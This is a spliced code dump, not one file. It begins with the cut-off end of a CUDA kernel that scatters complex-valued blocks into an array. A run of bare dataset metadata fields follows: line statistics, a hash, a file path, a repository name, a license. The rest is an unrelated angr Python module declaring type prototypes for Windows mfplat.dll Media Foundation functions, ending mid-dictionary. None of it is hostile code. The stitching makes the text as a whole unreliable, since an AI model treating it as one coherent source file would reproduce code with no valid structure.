        'int32 Bx, int32 By, int32 Bz, int32 Bt, '
        'int32 Sx, int32 Sy, int32 Sz, int32 St, '
        'int32 Nx, int32 Ny, int32 Nz, int32 Nt',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / By / Bz / Bt / Nx / Ny / Nz / Nt;
        i -= b * Bx * By * Bz * Bt * Nx * Ny * Nz * Nt;
        int nt = i / Bx / By / Bz / Bt / Nx / Ny / Nz;
        i -= nt * Bx * By * Bz * Bt * Nx * Ny * Nz;
        int nz = i / Bx / By / Bz / Bt / Nx / Ny;
        i -= nz * Bx * By * Bz * Bt * Nx * Ny;
        int ny = i / Bx / By / Bz / Bt / Nx;
        i -= ny * Bx * By * Bz * Bt * Nx;
        int nx = i / Bx / By / Bz / Bt;
        i -= nx * Bx * By * Bz * Bt;
        int bt = i / Bx / By / Bz;
        i -= bt * Bx * By * Bz;
        int bz = i / Bx / By;
        i -= bz * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int it = nt * St + bt;
        int iz = nz * Sz + bz;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1] &&
            iy < output.shape()[ndim - 2] &&
            iz < output.shape()[ndim - 3] &&
            it < output.shape()[ndim - 4]) {
            int input_idx[] = {b, nt, nz, ny, nx, bt, bz, by, bx};
            int output_idx[] = {b, it, iz, iy, ix};
            atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
                      input[input_idx].real());
            atomicAdd(reinterpret_cast<T::value_type*>(
                &(output[output_idx])) + 1, input[input_idx].imag());
        }
        """,
        name='_blocks_to_array4_cuda_complex')
| 40.8125
| 79
| 0.38464
| 3,947
| 34,609
| 3.216114
| 0.035977
| 0.060501
| 0.030251
| 0.020167
| 0.930833
| 0.903813
| 0.89885
| 0.874902
| 0.869072
| 0.859146
| 0
| 0.031634
| 0.498541
| 34,609
| 847
| 80
| 40.860685
| 0.699798
| 0.03424
| 0
| 0.722458
| 0
| 0
| 0.081119
| 0.012813
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021186
| false
| 0
| 0.008475
| 0
| 0.033898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1247081add64badc149af8da67683a988746de63
| 111,647
|
py
|
Python
|
angr/procedures/definitions/win32_mfplat.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mfplat.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mfplat.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
# Module-level logger, named after this module per angr convention.
_l = logging.getLogger(name=__name__)
# SimLibrary collects the calling conventions and function prototypes that
# angr uses to model calls into this Windows system DLL.
lib = SimLibrary()
# Windows system DLL defaults: stdcall on 32-bit x86, the Microsoft x64
# calling convention on AMD64 (as set by the two calls below).
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("mfplat.dll")
prototypes = \
{
#
'MFSerializeAttributesToStream': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IStream")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttr", "dwOptions", "pStm"]),
#
'MFDeserializeAttributesFromStream': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IStream")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttr", "dwOptions", "pStm"]),
#
'MFCreateTransformActivate': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFActivate"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppActivate"]),
#
'MFCreateSourceResolver': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFSourceResolver"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppISourceResolver"]),
#
'CreatePropertyStore': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IPropertyStore"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppStore"]),
#
'MFGetSupportedSchemes': SimTypeFunction([SimTypePointer(SimStruct({"Anonymous": SimUnion({"Anonymous": SimStruct({"vt": SimTypeShort(signed=False, label="UInt16"), "wReserved1": SimTypeShort(signed=False, label="UInt16"), "wReserved2": SimTypeShort(signed=False, label="UInt16"), "wReserved3": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"cVal": SimTypeBottom(label="CHAR"), "bVal": SimTypeChar(label="Byte"), "iVal": SimTypeShort(signed=True, label="Int16"), "uiVal": SimTypeShort(signed=False, label="UInt16"), "lVal": SimTypeInt(signed=True, label="Int32"), "ulVal": SimTypeInt(signed=False, label="UInt32"), "intVal": SimTypeInt(signed=True, label="Int32"), "uintVal": SimTypeInt(signed=False, label="UInt32"), "hVal": SimTypeBottom(label="LARGE_INTEGER"), "uhVal": SimTypeBottom(label="ULARGE_INTEGER"), "fltVal": SimTypeFloat(size=32), "dblVal": SimTypeFloat(size=64), "boolVal": SimTypeShort(signed=True, label="Int16"), "__OBSOLETE__VARIANT_BOOL": SimTypeShort(signed=True, label="Int16"), "scode": SimTypeInt(signed=True, label="Int32"), "cyVal": SimTypeBottom(label="CY"), "date": SimTypeFloat(size=64), "filetime": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "puuid": SimTypePointer(SimTypeBottom(label="Guid"), offset=0), "pclipdata": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0), "bstrVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "bstrblobVal": SimTypeBottom(label="BSTRBLOB"), "blob": SimTypeBottom(label="BLOB"), "pszVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pwszVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "punkVal": SimTypeBottom(label="IUnknown"), "pdispVal": SimTypeBottom(label="IDispatch"), "pStream": SimTypeBottom(label="IStream"), "pStorage": SimTypeBottom(label="IStorage"), "pVersionedStream": SimTypePointer(SimStruct({"guidVersion": 
SimTypeBottom(label="Guid"), "pStream": SimTypeBottom(label="IStream")}, name="VERSIONEDSTREAM", pack=False, align=None), offset=0), "parray": SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), "cac": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAC", pack=False, align=None), "caub": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAUB", pack=False, align=None), "cai": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CAI", pack=False, align=None), "caui": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="CAUI", pack=False, align=None), "cal": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CAL", pack=False, align=None), "caul": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CAUL", pack=False, align=None), "cah": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="LARGE_INTEGER"), offset=0)}, name="CAH", pack=False, align=None), "cauh": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="ULARGE_INTEGER"), offset=0)}, name="CAUH", pack=False, align=None), "caflt": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=32), offset=0)}, name="CAFLT", pack=False, align=None), "cadbl": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADBL", pack=False, 
align=None), "cabool": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CABOOL", pack=False, align=None), "cascode": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CASCODE", pack=False, align=None), "cacy": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CY"), offset=0)}, name="CACY", pack=False, align=None), "cadate": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADATE", pack=False, align=None), "cafiletime": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)}, name="CAFILETIME", pack=False, align=None), "cauuid": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="Guid"), offset=0)}, name="CACLSID", pack=False, align=None), "caclipdata": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0)}, name="CACLIPDATA", pack=False, align=None), "cabstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CABSTR", pack=False, align=None), "cabstrblob": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="BSTRBLOB"), offset=0)}, name="CABSTRBLOB", pack=False, align=None), "calpstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), 
offset=0)}, name="CALPSTR", pack=False, align=None), "calpwstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CALPWSTR", pack=False, align=None), "capropvar": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="CAPROPVARIANT", pack=False, align=None), "pcVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pbVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "piVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "puiVal": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), "plVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pulVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pintVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "puintVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pfltVal": SimTypePointer(SimTypeFloat(size=32), offset=0), "pdblVal": SimTypePointer(SimTypeFloat(size=64), offset=0), "pboolVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "pdecVal": SimTypePointer(SimTypeBottom(label="DECIMAL"), offset=0), "pscode": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pcyVal": SimTypePointer(SimTypeBottom(label="CY"), offset=0), "pdate": SimTypePointer(SimTypeFloat(size=64), offset=0), "pbstrVal": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "ppunkVal": SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0), "ppdispVal": SimTypePointer(SimTypeBottom(label="IDispatch"), offset=0), "pparray": SimTypePointer(SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), offset=0), "pvarVal": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, 
align=None), "decVal": SimTypeBottom(label="DECIMAL")}, name="<anon>", label="None")}, name="PROPVARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pPropVarSchemeArray"]),
#
'MFGetSupportedMimeTypes': SimTypeFunction([SimTypePointer(SimStruct({"Anonymous": SimUnion({"Anonymous": SimStruct({"vt": SimTypeShort(signed=False, label="UInt16"), "wReserved1": SimTypeShort(signed=False, label="UInt16"), "wReserved2": SimTypeShort(signed=False, label="UInt16"), "wReserved3": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"cVal": SimTypeBottom(label="CHAR"), "bVal": SimTypeChar(label="Byte"), "iVal": SimTypeShort(signed=True, label="Int16"), "uiVal": SimTypeShort(signed=False, label="UInt16"), "lVal": SimTypeInt(signed=True, label="Int32"), "ulVal": SimTypeInt(signed=False, label="UInt32"), "intVal": SimTypeInt(signed=True, label="Int32"), "uintVal": SimTypeInt(signed=False, label="UInt32"), "hVal": SimTypeBottom(label="LARGE_INTEGER"), "uhVal": SimTypeBottom(label="ULARGE_INTEGER"), "fltVal": SimTypeFloat(size=32), "dblVal": SimTypeFloat(size=64), "boolVal": SimTypeShort(signed=True, label="Int16"), "__OBSOLETE__VARIANT_BOOL": SimTypeShort(signed=True, label="Int16"), "scode": SimTypeInt(signed=True, label="Int32"), "cyVal": SimTypeBottom(label="CY"), "date": SimTypeFloat(size=64), "filetime": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "puuid": SimTypePointer(SimTypeBottom(label="Guid"), offset=0), "pclipdata": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0), "bstrVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "bstrblobVal": SimTypeBottom(label="BSTRBLOB"), "blob": SimTypeBottom(label="BLOB"), "pszVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pwszVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "punkVal": SimTypeBottom(label="IUnknown"), "pdispVal": SimTypeBottom(label="IDispatch"), "pStream": SimTypeBottom(label="IStream"), "pStorage": SimTypeBottom(label="IStorage"), "pVersionedStream": SimTypePointer(SimStruct({"guidVersion": 
SimTypeBottom(label="Guid"), "pStream": SimTypeBottom(label="IStream")}, name="VERSIONEDSTREAM", pack=False, align=None), offset=0), "parray": SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), "cac": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAC", pack=False, align=None), "caub": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAUB", pack=False, align=None), "cai": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CAI", pack=False, align=None), "caui": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="CAUI", pack=False, align=None), "cal": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CAL", pack=False, align=None), "caul": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CAUL", pack=False, align=None), "cah": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="LARGE_INTEGER"), offset=0)}, name="CAH", pack=False, align=None), "cauh": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="ULARGE_INTEGER"), offset=0)}, name="CAUH", pack=False, align=None), "caflt": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=32), offset=0)}, name="CAFLT", pack=False, align=None), "cadbl": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADBL", pack=False, 
align=None), "cabool": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CABOOL", pack=False, align=None), "cascode": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CASCODE", pack=False, align=None), "cacy": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CY"), offset=0)}, name="CACY", pack=False, align=None), "cadate": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADATE", pack=False, align=None), "cafiletime": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)}, name="CAFILETIME", pack=False, align=None), "cauuid": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="Guid"), offset=0)}, name="CACLSID", pack=False, align=None), "caclipdata": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0)}, name="CACLIPDATA", pack=False, align=None), "cabstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CABSTR", pack=False, align=None), "cabstrblob": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="BSTRBLOB"), offset=0)}, name="CABSTRBLOB", pack=False, align=None), "calpstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), 
offset=0)}, name="CALPSTR", pack=False, align=None), "calpwstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CALPWSTR", pack=False, align=None), "capropvar": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="CAPROPVARIANT", pack=False, align=None), "pcVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pbVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "piVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "puiVal": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), "plVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pulVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pintVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "puintVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pfltVal": SimTypePointer(SimTypeFloat(size=32), offset=0), "pdblVal": SimTypePointer(SimTypeFloat(size=64), offset=0), "pboolVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "pdecVal": SimTypePointer(SimTypeBottom(label="DECIMAL"), offset=0), "pscode": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pcyVal": SimTypePointer(SimTypeBottom(label="CY"), offset=0), "pdate": SimTypePointer(SimTypeFloat(size=64), offset=0), "pbstrVal": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "ppunkVal": SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0), "ppdispVal": SimTypePointer(SimTypeBottom(label="IDispatch"), offset=0), "pparray": SimTypePointer(SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), offset=0), "pvarVal": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, 
align=None), "decVal": SimTypeBottom(label="DECIMAL")}, name="<anon>", label="None")}, name="PROPVARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pPropVarMimeTypeArray"]),
#
'MFGetSystemTime': SimTypeFunction([], SimTypeLongLong(signed=True, label="Int64")),
#
'MFCreateSystemTimeSource': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFPresentationTimeSource"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppSystemTimeSource"]),
#
'MFCreatePresentationDescriptor': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFStreamDescriptor"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="IMFPresentationDescriptor"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cStreamDescriptors", "apStreamDescriptors", "ppPresentationDescriptor"]),
#
'MFSerializePresentationDescriptor': SimTypeFunction([SimTypeBottom(label="IMFPresentationDescriptor"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pPD", "pcbData", "ppbData"]),
#
'MFDeserializePresentationDescriptor': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="IMFPresentationDescriptor"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cbData", "pbData", "ppPD"]),
#
'MFCreateStreamDescriptor': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="IMFStreamDescriptor"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwStreamIdentifier", "cMediaTypes", "apMediaTypes", "ppDescriptor"]),
#
'MFCreateTrackedSample': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFTrackedSample"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMFSample"]),
#
'MFCreateMFByteStreamOnStream': SimTypeFunction([SimTypeBottom(label="IStream"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pStream", "ppByteStream"]),
#
'MFCreateStreamOnMFByteStream': SimTypeFunction([SimTypeBottom(label="IMFByteStream"), SimTypePointer(SimTypeBottom(label="IStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pByteStream", "ppStream"]),
#
'MFCreateMFByteStreamOnStreamEx': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["punkStream", "ppByteStream"]),
#
'MFCreateStreamOnMFByteStreamEx': SimTypeFunction([SimTypeBottom(label="IMFByteStream"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pByteStream", "riid", "ppv"]),
#
'MFCreateMediaTypeFromProperties': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["punkStream", "ppMediaType"]),
#
'MFCreatePropertiesFromMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMediaType", "riid", "ppv"]),
#
'MFCreateContentProtectionDevice': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="IMFContentProtectionDevice"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ProtectionSystemId", "ContentProtectionDevice"]),
#
'MFIsContentProtectionDeviceSupported': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ProtectionSystemId", "isSupported"]),
#
'MFCreateContentDecryptorContext': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IMFDXGIDeviceManager"), SimTypeBottom(label="IMFContentProtectionDevice"), SimTypePointer(SimTypeBottom(label="IMFContentDecryptorContext"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidMediaProtectionSystemId", "pD3DManager", "pContentProtectionDevice", "ppContentDecryptorContext"]),
#
'MFStartup': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["Version", "dwFlags"]),
#
'MFShutdown': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFLockPlatform': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFUnlockPlatform': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFPutWorkItem': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "pCallback", "pState"]),
#
'MFPutWorkItem2': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "Priority", "pCallback", "pState"]),
#
'MFPutWorkItemEx': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "pResult"]),
#
'MFPutWorkItemEx2': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "Priority", "pResult"]),
#
'MFPutWaitingWorkItem': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncResult"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hEvent", "Priority", "pResult", "pKey"]),
#
'MFAllocateSerialWorkQueue': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueue", "pdwWorkQueue"]),
#
'MFScheduleWorkItemEx': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult"), SimTypeLongLong(signed=True, label="Int64"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult", "Timeout", "pKey"]),
#
'MFScheduleWorkItem': SimTypeFunction([SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown"), SimTypeLongLong(signed=True, label="Int64"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pCallback", "pState", "Timeout", "pKey"]),
#
'MFCancelWorkItem': SimTypeFunction([SimTypeLongLong(signed=False, label="UInt64")], SimTypeInt(signed=True, label="Int32"), arg_names=["Key"]),
#
'MFGetTimerPeriodicity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Periodicity"]),
#
